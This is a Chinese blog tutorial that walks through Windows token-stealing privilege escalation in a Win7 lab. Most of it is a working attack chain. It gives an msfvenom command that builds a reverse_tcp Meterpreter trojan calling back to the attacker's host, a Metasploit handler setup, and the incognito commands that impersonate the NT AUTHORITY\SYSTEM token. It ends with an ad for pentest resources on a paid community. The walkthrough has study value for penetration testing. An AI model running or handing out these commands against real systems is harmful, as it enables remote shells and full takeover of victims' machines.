admin管理员组

文章数量:1568516

一、令牌窃取提升介绍

原理: 进行远程过程调用时请求提升权限,然后调用它从而生成特权安全令牌以执行特权操作。当系统允许令牌不仅用于进程本身,还用于原始请求进程时,漏洞就会出现。

令牌窃取方式在Windows2008之后的高版本操作系统已经没用了,只能用于一些低版本系统。比如:

Microsoft Windows XP Professional SP3和之前版本
Windows Server 2003 SP2和之前的版本
Windows Server 2003 x64和x64 SP2
Windows Server 2003 (用于基于Itanium的系统SP2和先前版本)
Windows Server 2008 x32 x64
Windows Server 2008 (用于基于Itanium的系统)
Windows Vista SP1和之前的版本
Windows Vista x64 SP1和之前的版本

本地提权实验 流程:获取会话-利用模块-窃取令牌-提权

二、提权复现

演示一:win7系统

其它系统是一样的攻击手法,不一一演示了

靶机 IP:192.168.174.130
攻击 IP:192.168.174.129

1、在攻击 msf 服务器上(IP:192.168.174.130)执行以下命令,生成反弹shell木马

msfvenom -p  windows/meterpreter/reverse_tcp lhost=192.168.174.129 lport=6666  -f exe -o /root/w.exe


2、在攻击 msf 服务器上执行以下命令,监听端口

msfconsole

use exploit/multi/handler
set payload  windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
exploit


3、将该木马w.exe,上传到远程目标服务器,并双击运行木马程序。

4、本地监听到会话,查看权限为普通用户 zxxxx

5、执行以下命令,利用模块,窃取令牌,提权成功。

use incognito  # 进入incognito
list_tokens -u # 列出令牌
impersonate_token "NT AUTHORITY\SYSTEM"  # 令牌假冒 SYSTEM

更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥

本文标签: 令牌权限Windowsamp